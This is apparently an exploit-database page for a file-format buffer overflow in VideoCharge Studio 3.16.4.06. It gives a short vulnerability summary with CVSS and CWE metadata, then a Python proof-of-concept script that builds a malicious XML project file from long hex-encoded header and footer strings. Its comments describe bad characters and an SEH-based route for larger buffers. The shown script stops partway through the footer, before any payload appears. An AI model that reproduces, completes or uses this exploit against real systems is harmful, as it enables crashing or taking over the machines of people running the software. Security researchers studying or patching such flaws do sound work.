header-logo
Suggest Exploit
vendor:
VideoCharge Studio
by:
@evil_comrade
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: VideoCharge Studio
Affected Version From: 3.16.4.06
Affected Version To: 3.16.4.06
Patch Exists: NO
Related CWE: N/A
CPE: a:videocharge:videocharge_studio:3.16.4.06
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP3
2015

VideoCharge v3.16.4.06

VideoCharge v3.16.4.06 is vulnerable to a buffer overflow vulnerability. An attacker can create a malicious XML file with a buffer of 1000 A's and crash the program. The program only allows ascii printable characters and 5c (retn) is a bad character (no push[reg] ret, jmp[reg] or call[reg]).

Mitigation:

Input validation should be done to prevent buffer overflow attacks.
Source

Exploit-DB raw data:

#!/usr/bin/python
# Exploit Title: VideoCharge v3.16.4.06
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com 
# Version: 3.16.4.06
# Tested on: Win XP3
# Software link: http://www.softpedia.com/dyn-postdownload.php/36f0ea5a24f3=
f5f49eb4e12a379b1874/554f2748/a3a/0/1
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
#        All third party modules are SAFESEH'ed
#        A bigger buffer of > 1000 & <3000 A's will also crash the program =
but you'd have to
#        use the SEH route which will make for a good exercise since the pr=
ogram only
#        ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+=
ret, jmp[reg] or call[reg] )
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
"\x0d\x0a\x3c\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x76\x65\x72\x77\x72\x69\x74\x65\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x54\x68\x75\x6d\x62\x4f\x6e\x6c\x79\x3e\x0d\x0a\x3c\x2f"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x41\x63\x74\x69\x6f\x6e"
"\x52\x6f\x6f\x74\x5f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69"
"\x76\x65\x46\x72\x61\x6d\x65\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73"
"\x65\x72\x74\x45\x76\x65\x72\x79\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x32\x35\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65"
"\x41\x63\x74\x69\x6f\x6e\x49\x6e\x73\x65\x72\x74\x45\x76\x65\x72"
"\x79\x3e\x0d\x0a\x3c\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46"
"\x72\x61\x6d\x65\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x77\x65"
"\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f\x6e\x52\x6f\x6f\x74\x5f"
"\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72\x61\x6d\x65\x3e"
"\x0d\x0a\x3c\x2f\x54\x77\x65\x6e\x74\x79\x46\x69\x76\x65\x46\x72"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69\x6c"
"\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x54\x68\x75\x6d\x62\x6e\x61\x69"
"\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62\x6e"
"\x61\x69\x6c\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d"
"\x62\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x2f\x41\x63\x74\x69\x6f"
"\x6e\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x46\x69\x6c\x65\x46\x6f\x72\x6d\x61\x74"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x7b\x31\x41\x44\x43\x33\x33\x42"
"\x39\x2d\x35\x39\x36\x44\x2d\x34\x33\x30\x43\x2d\x42\x35\x39\x41"
"\x2d\x36\x44\x37\x37\x41\x42\x43\x42\x35\x46\x44\x39\x7d\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x37\x32\x27\x3e\x0d\x0a\x3c\x47\x49\x46"
"\x41\x3e\x0d\x0a\x3c\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x50\x61\x6c"
"\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f"
"\x72\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x38\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
